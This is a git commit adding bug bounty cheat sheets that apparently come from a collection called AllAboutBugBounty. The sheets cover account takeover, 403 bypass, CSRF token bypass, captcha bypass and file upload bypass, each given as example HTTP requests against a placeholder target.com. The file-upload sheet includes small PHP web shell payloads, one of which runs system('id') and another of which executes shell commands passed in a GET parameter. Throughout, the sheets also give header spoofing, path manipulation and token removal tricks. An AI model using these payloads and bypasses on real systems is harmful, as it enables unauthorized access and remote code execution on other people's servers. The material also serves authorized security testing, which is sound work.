增加AllAboutBugBounty项目的文档

Author: BaCde

BugBounty/AllAboutBugBounty/Account Takeover.md

@@ -0,0 +1,20 @@
+## Account Takeover
+
+1. Using OAuth Misconfiguration
+   - Victim has a account in evil.com
+   - Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
+   - Attacker changed his/her email to victim email.
+   - When the victim try to create an account on evil.com, it says the email already exists.
+
+2. Try re-sign up using same email
+```
+POST /newaccount
+[...]
+[email protected]&password=1234
+```
+After sign up using victim email, try signup again but using different password
+```
+POST /newaccount
+[...]
+[email protected]&password=hacked
+```

BugBounty/AllAboutBugBounty/Bypass 403.md

@@ -0,0 +1,54 @@
+# 403 Forbidden Bypass
+
+1. Using "X-Original-URL" header
+```
+GET /admin HTTP/1.1
+Host: target.com
+```
+Try this to bypass
+```
+GET /anything HTTP/1.1
+Host: target.com
+X-Original-URL: /admin
+```
+
+2. Appending **%2e** after the first slash
+```
+http://target.com/admin => 403
+```
+Try this to bypass
+```
+http://target.com/%2e/admin => 200
+```
+
+3. Try add dot (.) and slash (/) in the URL
+```
+http://target.com/admin => 403
+```
+Try this to bypass
+```
+http://target.com/admin/. => 200
+http://target.com//admin// => 200
+http://target.com/./admin/./ => 200
+```
+
+4. Add "..;/" after the directory name
+```
+http://target.com/admin
+```
+Try this to bypass
+```
+http://target.com/admin..;/
+```
+
+
+5. Try to uppercase the alphabet in the url
+```
+http://target.com/admin
+```
+Try this to bypass
+```
+http://target.com/aDmIN
+```
+
+Source: [@iam_j0ker](https://twitter.com/iam_j0ker)

BugBounty/AllAboutBugBounty/Bypass CSRF.md

@@ -0,0 +1,119 @@
+# Bypass CSRF Token
+1. Change single character
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab
+```
+
+2. Sending empty value of token
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=
+```
+
+3. Replace the token with same length
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaabaa
+```
+4. Changing POST / GET method
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1
+Host: target.com
+[...]
+```
+
+5. Remove the token from request
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa
+```
+Try this to bypass
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456
+```
+
+6. Use another user's valid token
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=ANOTHER_VALID_TOKEN
+```
+
+7. Try to decrypt hash
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=MTIzNDU2
+```
+MTIzNDU2 => 123456 with base64
+
+8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=vi802jg9f8akd9j123
+```
+When we register again, the request like this
+```
+POST /register HTTP/1.1
+Host: target.com
+[...]
+
+username=dapos&password=123456&token=vi802jg9f8akd9j124
+```
+If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part

BugBounty/AllAboutBugBounty/Bypass Captcha.md

@@ -0,0 +1,59 @@
+# Bypass Captcha
+1. Try changing the request method, for example POST to GET
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
+```
+
+Change the method to GET
+```
+GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
+Host: target.com
+[...]
+```
+
+2. Try remove the value of the captcha parameter
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=&_Username=daffa&_Password=test123
+```
+
+3. Try reuse old captcha token
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
+```
+
+4. Convert JSON data to normal request parameter
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
+```
+Convert to normal request
+```
+POST / HTTP 1.1
+Host: target.com
+[...]
+
+_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
+```
+
+5. Try custom header to bypass captcha
+```
+X-Originating-IP: 127.0.0.1
+X-Forwarded-For: 127.0.0.1
+X-Remote-IP: 127.0.0.1
+X-Remote-Addr: 127.0.0.1
+```

BugBounty/AllAboutBugBounty/Bypass File Upload.md

@@ -0,0 +1,83 @@
+# Bypass File Upload
+1. Change the ContentType
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: application/x-php
+```
+Change the Content-Type
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: image/jpeg
+```
+
+2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
+Content-Type: application/x-php
+```
+Change the request to this
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: application/x-php
+```
+
+3. Upload the payload, but start with GIF89a; and
+```
+POST /images/upload/ HTTP/1.1
+Host: target.com
+[...]
+
+---------------------------829348923824
+Content-Disposition: form-data; name="uploaded"; filename="dapos.php"
+Content-Type: image/gif
+
+GIF89a; <?php system("id") ?>
+```
+And dont forget to change the content-type to image/gif
+
+4. Bypass content length validation, it can be bypassed using small payload
+```
+(<?=`$_GET[x]`?>)
+```
+
+5. Using null byte in filename
+```
+file.php%00.gif
+```
+
+6. Using double extensions for the uploaded file
+```
+file.jpg.php
+```
+
+7.  Uploading an unpopular php extensions (php4,php5,php6,phtml)
+```
+file.php5
+```
+
+8. Try to randomly capitalizes the file extension
+```
+file.pHP5
+```
+
+9. Mix the tips!